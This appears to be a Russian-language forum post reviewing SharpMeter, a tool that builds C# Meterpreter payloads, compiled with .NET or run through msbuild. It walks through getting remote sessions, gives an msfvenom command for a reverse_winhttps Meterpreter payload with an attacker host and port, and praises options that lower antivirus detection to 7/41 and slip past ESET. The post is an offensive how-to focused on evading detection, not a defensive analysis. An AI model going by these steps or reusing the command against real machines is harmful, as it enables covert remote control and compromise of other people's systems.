SharpMeter - генератор полезных нагрузок C-sharp

посмотрим сегодня функционал программы SharpMeter которая позволяет нам создавать полезные нагрузки на языке C#. Написанная на питоне. Все тривиально просто. И так качнули с гитхаба. Запустили на виндоус машине,смотрим справку:

Поддерживает наш скрипт два режима генерации полезной нагрузки:
Путем ввода айпи и порта атакуещего + опции
Путем добавления хекс кода + опции
И так давайте сначала первый простой метод путем создания без либо каких опций:


Видите он как и мой скрипт создает список команд для метасплоита и команду компиляции через NET Framework.
Поднимем листенер,выполним команду для компиляции:
Запускаем - получаем сессию

Что касается детекта на АВ. Вот результаты :

Из известных АВ детектится Есетом.

Ну не FUD но тоже не плохо довольно) Если использовать с параметрами -w -x , то детект будет 7/41 но ЕСЕТ не будет палит и другие известные АВ также
Вот результат бинарника созданно с этими параметрами.
Дальше пробуем тоже самое только с дополнительными опциями:
Получили команду для msbuild.
Запускаем и прилетает сессия без компиляции в бинарный файл.
Ну и второй способ довольно интересный)))
Создаем полезную нагрузку через msfvenom сначала командой:

Код (Text):

msfvenom -p windows/meterpreter/reverse_winhttps lhost=192.168.137.92 lport=1337 -f hex

Копипастим сроку в хексе в наш параметр для SharpMeter:


Запускаем команду msbuild - получаем сессию)


Все довольно просто и удобноhttps://www.youtube.com/watch?v=iUcAWaRcHsk